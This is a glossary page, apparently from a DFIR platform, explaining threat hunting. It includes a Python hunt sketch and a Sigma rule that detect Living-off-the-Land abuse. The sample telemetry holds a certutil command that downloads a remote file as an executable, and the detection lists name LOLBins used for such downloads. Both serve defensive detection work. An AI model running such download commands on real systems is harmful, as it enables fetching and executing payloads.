Threat Hunting
The proactive, hypothesis-driven search for adversary activity that has evaded existing security controls.
Definition
Threat hunting is the practice of manually searching through networks, endpoints, and datasets to detect threats that automated controls have not flagged. Unlike reactive incident response, hunting is initiated by an analyst who forms a hypothesis — based on threat intelligence, attacker TTPs, or anomalous data — and then sets out to prove or disprove it.
Why It Matters
Automated detections operate on known signatures and rules. Skilled adversaries specifically craft their operations to avoid these controls. Threat hunting closes the gap by applying human reasoning and contextual knowledge to discover stealthy intrusions, lateral movement, and persistence mechanisms that would otherwise go undetected until significant damage has occurred.
How It Works
A hunt typically follows three phases: hypothesis formation (e.g., 'has this network seen Living-off-the-Land techniques consistent with APT29?'), data collection and analysis (querying logs, EDR telemetry, and network data for evidence), and response and documentation (escalating confirmed findings and converting validated hypotheses into new automated detections). MITRE ATT&CK is the standard framework for structuring hunt hypotheses around adversary behaviors.
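The data-collection phase above can be sketched as a simple query over process-creation telemetry. This is a minimal, hypothetical example: the event schema, field names, and the LOLBin/argument lists are illustrative assumptions, not a real EDR API.

```python
# Hypothetical hunt sketch: test the hypothesis "Living-off-the-Land
# binary (LOLBin) abuse is present" against process-creation events.
# The event dicts and field names below are illustrative, not a real
# EDR schema.

LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe"}
SUSPICIOUS_ARGS = ("-urlcache", "http://", "https://", "scrobj.dll")

def hunt_lolbins(events):
    """Return events where a known LOLBin ran with download/exec-style arguments."""
    hits = []
    for ev in events:
        name = ev["process"].lower()
        cmdline = ev["cmdline"].lower()
        # Evidence for the hypothesis: a LOLBin plus a suspicious argument.
        if name in LOLBINS and any(arg in cmdline for arg in SUSPICIOUS_ARGS):
            hits.append(ev)
    return hits

events = [
    {"host": "ws01", "process": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://198.51.100.7/a.txt a.exe"},
    {"host": "ws02", "process": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]
print([e["host"] for e in hunt_lolbins(events)])  # → ['ws01']
```

A real hunt would run a query like this across fleet-wide telemetry; a confirmed hit is then escalated, and the logic is converted into an automated detection so the hypothesis never needs to be re-hunted manually.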
DFIR Platform
AI Triage
The DFIR Lab AI Triage supports threat hunting by mapping findings to MITRE ATT&CK techniques and generating detection logic that encodes hunt results as reusable Sigma or YARA rules. IOC Enrichment provides the reputation, geolocation, and threat context needed to investigate suspicious indicators discovered during a hunt.
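As an example of what encoding a validated hunt result looks like, a finding of certutil.exe being abused to download payloads could be captured as a Sigma rule. This is an illustrative sketch, not output from the platform:

```yaml
title: Certutil Download via URLCache Flag
status: experimental
description: >
    Detects certutil.exe used to download files, a common
    Living-off-the-Land technique (MITRE ATT&CK T1105).
references:
    - https://attack.mitre.org/techniques/T1105/
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\certutil.exe'
        CommandLine|contains: '-urlcache'
    condition: selection
level: medium
```

Once deployed, a rule like this turns a one-off manual hunt into a persistent automated detection.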